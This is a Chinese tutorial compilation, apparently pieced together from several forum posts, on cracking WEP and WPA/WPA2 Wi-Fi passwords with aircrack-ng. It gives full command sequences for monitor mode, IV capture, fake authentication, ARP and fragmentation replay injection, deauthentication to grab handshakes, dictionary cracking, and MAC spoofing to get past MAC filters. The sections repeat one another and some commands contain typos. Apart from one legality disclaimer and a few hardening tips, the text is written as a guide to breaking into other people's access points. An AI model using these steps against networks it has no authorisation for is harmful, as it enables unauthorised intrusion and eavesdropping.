1、首先
ifconfig -a
查看自己的网卡,我的是eth1,也有的是WLAN
2、ifconfig -a eth1 up
驱动自己的网卡
3、airmon-ng start eth1 6
开启自己网卡的监听模式,频道号为你要破解的AP的频道号。查看的方法很多,我就不细说了。
4、airodump-ng –ivs -w result -c 6 eth1
开始抓包,–ivs代表只抓IVS包,此处是两个“-”-w代表写入文件,后面我写的是result即抓到的包都保存在以result为文件名的文件中,-c代表频道,这里是6。
5、开另一shell窗口
伪装连接 aireplay-ng -1 0 -e apID -a apmac -h 网卡mac eth1
成功后 aireplay-ng -3 -b -apmac -h 网卡mac -x 30 eth1
运行后会显示
read **** packets(got 0 arp requests),sent 0 packets…
大家不要着急,这是没有ARP包,耐心等待。不过我破的有的等到10W多还是没用,建议换个时间试试。
-x 30这个是关键,-x是指定注入速度,这里是30,一般资料都是 -x 1024,但实际上4311在BT3使用1024的注入速度,的确是可以的,能达到4、500,不过过不了1、2秒,就提示
write failed: Cannot allocate memory
wi_write(): Illegal seek
注入就停了。在论坛上看帖子有人说30就能稳定,经实验的确如此。大家可以尝试提高这个数值,看最大能到多少。毕竟30还是比较慢的,我室友看优酷都能到 70多,不用注入,一会儿就够了。
6、等DATA到了15000左右
开另一shell窗口
aircrack-ng -n 64 -b 网卡mac result*.ivs
即可,如果没出密码,就是DATA不够,继续等几W个,再次运行。我的经验是10位纯数字密码3W内90%会出。
WEP 破解
1) ifconfig -a
2) ifconfig 6
3) airodump-ng –ivs -w name -c 6 ath1
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
-1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
新的第5步: aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
8) aircrack-ng -n 64 -b ap_mac name-01.ivs
一 打开shell窗口
二 查看网卡 ifconfig -a
三 加载驱动 ifconfig -a rausb0 up
四 输入命令 airmon-ng start rausb0 6
五 开始抓包 airodump-ng –ivs -w 123 -c 6 rausb0
PS:data>0 PWR>30 cipher=wep
六 新开shll窗口输入 aireplay-ng -1 0 -e TP-LINK -a 00:11:22:33:44:55 -h 00:99:88:77:66:55 rausb0
PS:路由名字MAC地址一定要参照显示大小写。00:11:22….对方mac。00:99:88….自己mac
看到笑脸 🙂 连接成功
七 开始攻击 aireplay-ng -5 -b 00:11:22:33:44:55 -h 00:99:88:77:66:55 rausb
如果正常,会提示:user this packet? 输入y。等一下会得到一个*.xor
八 产生一个注入攻击包。输入 ppacketforge-ng -0 -a 00:11:22:33:44:55 -h 00:99:88:77:66:55 -k 255.255.255.255 -l 255.255.255.255 -y foragment-0224-120114.xor(复制上面的) -w myarp
成功提示:wrote packet to:myarp
九 输入 aireplay-ng -2 -r myarp -x 1024 rausb0
成功提示:use this packet ? 输入y 此时data疯涨 到20000 开始破解
十 新开shll窗口输入 aircrack-ng *.ivs
以下一一解释:(运行这些命令都需要打开终端窗口,可以使用Ctrl+C 从文本文件Copy, 然后 Shift+Insert 粘贴入终端窗口)
1)ifconfig -a
这个命令用于找到自己的无线网卡的 Mac地址。请记录下来备用。
2) airmon-ng start wifi0 6(打开网卡的监控模式,不是所有的网卡都支持)
这个命令用于将自己的无线网卡置于Monitor 模式,即类似一个AP的效果,因此可以有抓别人包的功能。
其中 wifi0 是我电脑里面给无线网卡的 ,一般应该都是这个,第一个ifconfig -a命令可以看得到。
wifi0 后面的那个6 ,是需要破解的AP的频道,如果不知道,可以在事前左下角开始菜单里面,找到 第二项 Internet 下面的倒数第二个画着 无线网的一个工具,用它可以看到那些需要破解的AP的频道(Channel)。
运行命令成功以后,你会看到返回的提示显示出现一个 Ath1(如果你是 Athoes的无线网卡的话就是这个,其他的可能不同,不过一般都是XXX1这样)
这个就是你的用于破解的网卡代号
这个命令,简而言之,就是把你的无线网卡置于监控模式,并且指定监控的频道。
如果你发现弄错了频道,那么没关系,重新运行一遍就可以了,不过这个时候,可能就会变成 Ath2…Ath3 等等,但是好像最多运行三次,然后就会失败。
3) airodump-ng –ivs -w name -c 6 ath1
这个命令比较关键,你运行以后,就会列出所有该频道的AP。
其中,6 是指你需要监控的频道,必须和第二个命令里的一样, ath1是刚才第二步出现的别名。
这个命令运行以后,显示的内容比较多,简单介绍一下:
BSSID : 其实就是AP的Mac 地址
PWR: AP信号的大小,一般,低于10,就比较麻烦了,丢包情况严重,比较难破解
RXQ: 干扰的大小
Beacons:发送接受的包,参考信息,在跳说明有数据
#Data:这个比较重要,是接受到可以用来破解的特殊包,如果一直不变,那么,说明没有客户端连接,破解可能很麻烦,如果对方有大文件在下载,那么这个跳的速度非常快,10来分钟就可以有足够的包来破解了,如果跳得很慢,那么,就需要用一些特殊的方式来破解了。
CH:频道
MB:网络连接速度 54就是54MB
ENC, CIPHER,AUTH
这些是加密方式,我们这次只讨论显示为 WEP 和 WEP+ OPN的
如果显示 WPA TKIP 啥的,只能密码穷举破解,个人认为希望不大。
ESSID: 这个是AP的名字,需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解,可以用中文的ESSID
过一会儿,下面会显示哪些客户端连接到了哪些AP,针对有些Mac地址加密的,很容易模拟对方客户端的Mac从而骗进去,所以不要简单地相信Mac 限制功能。
这个窗口就开着好了,不用关闭,以后的命令,需要重新打开一个终端窗口操作。
4)aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
这一步开始,我们要做一些真正的破解工作,主要是针对那些客户端仅仅连接,没什么流量的AP,这种AP,#Data的增长非常慢,往往需要很长的时间才有可能取得足够的包(一般5位的密码需要10000个包左右,更多的密码就要更多的。。。。)这个时候就需要 aireplay-ng 出面了,顾名思义,这个软件就是 Replay,也就是说,模拟发包。
首先解释命令:
-e ap_essid 就是 -e 之后加上你需要破解的essid ,比如 TP-LINK , linksys 啥的,注意大小写。
-a ap_mac 就是 -a 之后加上你需要破解的AP的Mac地址,第三步BSSID就可以看得到。不需要 :哦。
-h XXXXXXXXXX 就是 -h 之后,加上你的无线网卡的 Mac地址, 在第一步你可以得到。
ath1 ,上面解释过了。
一个样板例子:
aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 ath1
这里有个小的建议,大家可以把以上的命令,都记录在一个文件里,然后把里面的XXXXXXXX都用自己的网卡Mac地址替换掉,这样就不需要每次都输入自己的Mac地址了。每次都可以用Copy Paste的方式来输入,这样可以有效防止什么1 和 l , O和0 的混淆。
这一条命令,是用欺骗的方式,连接上那个AP,因此,如果网络信号不好,可能会执行不成功。
如果成功了,那么会显示Successful :> 字样。否则,请让信号强度大于10。
5)aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
上一条成功以后,我们需要开始收集那些需要的数据包,才能够进行模拟,并且破解。
所谓的需要的数据包,就是 #Data的数据,如果 #Data一直是0,那么可能会很麻烦,最好的情况是 #Data缓慢增长的这种情况。
解释一下
-b ap_mac 就是你需要破解的AP的Mac 地址,从第三步那里的 BSSID可以找得到。
-h XXXXXXXXXX 就是你自己网卡的Mac地址。
Ath1 和上面一样。。。。。
这一条命令的执行,和#data包有关,如果#Data 没有增加,则这个命令会一直执行,直到捕获一个#Data包。
捕获以后,程序会问你是否需要用这个包来模拟攻击。回答Y即可。
如果攻击成功,则会显示成功,失败往往是因为信号太差造成的,如果攻击失败(往往是捕获的包有问题),程序重试N次以后,或自动重新开始捕捉包,继续进行即可。
等成功完成以后,会显示一个文件名:fragment-XXXXX-XXXXXX.xor
这个文件名,XXXXX里面是数字,是一个文件。马上会用得到。
这一步是最有可能失败的一步,尽量保持信号好一点。
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
第六步,参数比较多,解释一下:
-a ap_mac 是待破解的AP的Mac地址,
-h XXXXXXXXX 是你自己的无线网卡Mac地址
fragment-XXXXX-XXXXXX.xor 就是第五步显示的那个文件名。
这一步会很快做完, 显示生成文件到 mrarp啥的,其实就是破解包的准备过程。
7) aireplay-ng -2 -r mrarp -x 1024 ath1
这一步没哈可以修改的,参数解释一下
ath1 是 你的无线网卡的名字
1024 是攻击速度,1024是最大值了,如果你的无线网卡不是MiniPCI的,个人建议设为 512 ,这样不容易死机。
当这一步开始执行,你会看到 第一个终端窗口里面,你破解的那个AP后面的 #Data在飞速增长,一般是 200个/s的速度,我们只需等待即可
8)我们可以新打开一个终端窗口,当 #Data达到 10000个的时候,就可以测试破解了,很多密码都可以 10000左右#Data就算出来
新窗口中运行:
aircrack-ng -n 64 -b ap_mac name-01.ivs
解释一下,
-b ap_mac 对方AP的Mac地址
name-01.ivs 其实是第三步自动生成的一个文件, 如果你多次运行了第三步,那么,可能会生成多个 name-XX.ivs文件,你可以到对应的文件夹里看一下(就在桌面上的第一个文件夹图标里),找到XX最大的那个,就是你当前正在使用的这个文件。
运行以后,如果运气好,一会儿就会显示破解出来的密码,同时会显示对应的Assic码,如果不是标准Assic码,就是一串数字,记录下来,搞掂。
运气不好的情况,这个程序会继续等待更多的#Data,等到了,就会重新计算一次密码。
不过呢,我也试过,30万个#Data都没能算出来,这个加密的兄弟真厉害。
小结一下:
本教程只针对 WEP 密码的破解,而且,最好有得到认证的客户端连接在这个AP上,如果没有,有些AP(比如TP-LINK)能够被破解,某些可能就无法破解。
本教程也提供了 模拟Mac地址从而破解 Mac限制的方法
如果你需要你的AP很难被破解,建议:
1)用WPA 加密方式,并且使用不可能被字典猜到的密码,目前还是基本可靠的
2)如果只支持 WEP加密,那么,尽量考虑用隐藏 SSID的方式,这样可以增加破解难度
3)如果只支持 WEP加密,那么,可以考虑使用中文名字作为SSID,这样基本问题不大。
4)一般破解时候,大家都会选择常用的频道,例如 6频道,第三步显示频道的时候,你的AP也会被列出来,那么第一个目标失败的时候,黑客往往会选择第二个容易下手的目标,但是如果你选择了8、 4、这些奇怪的频道,那么狠客往往懒得重新进入该频道的监控模式,你就可以逃过一劫。不过, 某些廉价AP,往往对6 频道做了优化,这个频道信号最强….这就没办法了。
5)有空换换你的密码:)
又注:联入网络以后,你可以管理他的AP,进行一些优化啥的,往往AP的密码,可能就是WEP的密码。
补充:
其中第5步:
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1 可以用新命令替代:
aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1
这一条命令可以自动地捕捉包,自动的发送包,自动的存为文件.
因此,这一步执行以后,如果开始正确的发收包,则可以看到 Data开始上涨,不过貌似速度会慢一点,用老命令的话,每秒500个增加,用新命令可能只有200个/秒
当足够多的数据包出现以后,可以直接运行第八步,跳过6\7两步
实验用eeepc破解wpa/wpa2的密码!
先要说明,任何不经别人同意而进入别人网络多是非法和不道德的行为。
如要实验请拿自已的ap开刀……
环境:
os/puppy 301.
软件:aircrack 0.9.3
字典文档pass.txt
ap无线加密方式wpa2/psk
ap TP-LINK mac 00:00:00:00:00:00 频道 6
eeepc mac AA:AA:AA:AA:AA:AA (自已小e的网卡地址)
一个已连上ap的客户端 mac BB:BB:BB:BB:BB:BB
还有就是信号能足够好。(自已实验当然没问题)
开终端输入
airmon-ng stop ath0
airmon-ng start wifi0 6
(置无线网卡到Monitor模式,频道 6)
airodump-ng -c 6 –bssid 00:00:00:00:00:00 -w psk ath0
捕获4-way握手认证到psk文件
另开终端输入
aircrack-ng -w pass.txt -b 00:00:00:00:00:00 psk*.cap
挂上字典穷举
如这时有4-way握手认证数据捕获到会进入穷举窗口,否则会返回如下信息:
No valid WPA handshakes found
这时你可做要么继续等,要么输入:
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath0
强制客户端重新连结上ap,你可以多试几次!
wpa破解的关键还是字典文档了,也就是说这个8-63位的密码一定要在你的字典中,当然是自已写入就行了……..
另外用eeepc运算你会抓狂的,试了就知道了.
BT3下破解共享密钥认证的WEP密码!
当然先是制作BT3。
然后要做的一步相当的重要,那就是卸载你用来攻击的无线网卡,并更改它的MAC为AP的无线客户端的MAC,一定是要合法无线客户端的MAC,要不然很难成功。我的网卡名为WIFI1,大家可以用命令先看下自己的网卡名。(因为我的笔记本内置的网卡也是ATHEROS芯片的,但是破解没有成功,所以改用 ICOM 的SL-5200,此卡相当不错,支持a/b/g三频,而且支持到14频道,这个很难得。最后笔记本自带的网卡也成功破解了,证实是方法不当所致)
相应的命令为:
ifconfig –a
ifconfig –a wifi1 down
macchanger –m 00:1a:73:c5:31:e0 wifi1
这个命令中攻击用无线网卡的MAC必须用冒号隔开,这个命令以后对MAC的操作就不需要再用冒号隔开了,直接输数字和字母就可以了(十六进制)。
其中需要注意的就是这个伪装的MAC必须与AP的无线客户端相同,要不然很难成功,至少我是这样的。
ifconfig –a wifi1 up(加载攻击用无线网卡)
airmon-ng start wifi1 13
上面的13代表的是无线AP所工作的频道,2.4G WIFI用频率的最高频道为14频道。
图片中所示的“ath2”就是我们最后攻击所用的无线网卡的接口名。
准备工作完毕以后我们就可以开始了。
首先我们先开始收集ivs包。
相应的命令为:
airodump-ng – –ivs –w check – –bssid 00131004e526 –c 13 ath2
–ivs 表示只收集ivs包,
-w 后面表示收集ivs包所生成的文件名,但最后往往会在文件名后加上-01、-02等等,
–bssid 表示AP的MAC,这样做的好处就是只收集与这个MAC相对应的AP的ivs包,
-c 后面跟的AP的频道数。
这一步做完我们就可以开始正式的攻击了。
相应的攻击命令为:
aireplay-ng -0 1 –a 00131004e526 –c 001a73c5-31e0 ath2
-0 表示对无线客户端进行认证攻击,使无线客户端断线重连,以获得握手包。
1
表示攻击的次数,一般顺利的话1次就够了,不顺利的话攻击无数次都不成功,建议大家在纯的BT3下进行,VM下很难获得,我在VM做了N次,用 WUSB54G V4只获得过一次握手包。
-a 后面跟的是AP的MAC,
-c 后面跟的所要攻击的无线客户端的MAC,记住这个参数一定是要-c,不能是-h哦。
攻击成功后会在airodump-ng的窗口的右上角出现捕获握手包的提示,它所保存的文件是以AP的MAC命名的XOR文件,注意与后面构建 ARP包所必须的XOR文件相区别。
然后就是进行虚假认证攻击,相应的命令为:
aireplay-ng -1 0 –e LINKSYS –a 00131004e526 –y check-01-00-13-10-04-e5-26.xor ath2
-1 表示虚假认证攻击,
0 表示攻击延时,
-e 表示AP的ESSID,
-a 表示AP的MAC,
-y 表示捕获的握手包所生成的文件名。
看图中提示好像攻击只成功了一半,challenge是失败的,但是依然可以构建arp包,并成功进行注入攻击破解WEP密码。而且攻击会不断进行,我是用Ctrl+c来停止的。
然后就要开始进行-5攻击了,相应的命令为:
Aireplay-ng -5 –b 00131004e526 –h 001a73c531e0 ath2
出现“ Use this packet?”提示后输入“y”并回车。出现下面的画面就表示成功获得了构建arp包所必须的xor文件
获得xor文件以后我们就可以构建arp包了,相应的命令为:
packetforge-ng -0 –a 00131004e526 –h 001a73c531e0 –k 255.255.255.255 –l 255.255.255.255 –y fragment-0215-195944.xor –w arp
-l 是大写字母L的小写,不是1哦,
-y 后面跟的是构建arp包所必须的xor文件,
-w 后面跟的是构建的arp包所生成的文件名。
这一步以后我们就可以进行让DATA猛涨的注入式攻击了,相应的命令为:
aireplay-ng -2 –r arp –x 1024 ath2
-2 就是注入式攻击
-r 后面跟的是arp包文件名,
-x 定义所发送的攻击包的大小,最大为1024,默认为512,以大家可以稳定发送攻击包的大小为准,根据无线网卡的不同而不同。
大家可以看到一分钟的时间DATA数就从2万多增长到6万多了。
其实只要DATA数到大概5万的时候就可以开启实时破解了,相应的命令为:
aircrack-ng -n 128 *.ivs
最后说几句,大家输入命令的时候可以用键盘的“↑”“↓”来翻出以前输入过的命令,还有比如要反复输入的MAC可以用复制和粘贴来操作,这样可以方便许多。总之一句话,大家需要反复的实践才能获得你想要的知识,我就是在试了N次,试了N多的无线网卡才获得成功的,以前一直用的好好的的LINKSYS 的WUSB54G V4无线网卡居然死活不行,这个网卡可是WEP开放式、WPA、WPA2都成功破解过的啊,最后还是笔记本网卡成功的。实验过程中发现还是笔记本无线网卡来的好用,几乎不会出现攻击假死的情况,USB的经常碰到。